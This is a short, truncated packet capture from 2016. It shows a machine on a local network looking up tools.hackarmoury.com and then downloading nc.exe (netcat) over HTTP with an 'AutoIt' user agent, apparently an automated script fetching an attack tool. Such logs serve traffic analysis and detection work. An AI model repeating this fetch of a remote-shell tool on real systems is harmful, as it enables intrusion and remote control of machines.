2016-09-27 18:49:21.741750 IP 192.168.1.102.51427 > 75.75.75.75.53: 60216+ A? tools.hackarmoury.com. (39) E..Cv…..k@…fKKKK…5./n..8………..tools.hackarmoury.com….. 2016-09-27 18:49:21.830486 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [S], seq 2438324637, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4j.@…&q…fUwR*.>.P.U…….. .z…………… 2016-09-27 18:49:21.946139 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 1205265555, win 256, length 0 E..(j.@…&|…fUwR*.>.P.U..G…P….7…….. 2016-09-27 18:49:21.949965 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 0:86, ack 1, win 256, length 86: HTTP: GET /all_binaries/nc.exe HTTP/1.1 E..~j.@…&%…fUwR*.>.P.U..G…P…….GET /all_binaries/nc.exe HTTP/1.1 User-Agent: AutoIt Host: tools.hackarmoury.com 2016-09-27 18:49:22.107250 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 385, win 255, length 0 E..(j.@…&z…fUwR*.>.P.U..G…P….b…….. 2016-09-27 18:49:33.280161 IP 192.168.1.102.51428 > 75.75.75.75.53: 53720+ A? www.download.windowsupdate.com. (48) E..Lv…..k6…fKKKK…5.8.8………….www.download.windowsupdate.com….. 2016-09-27 […]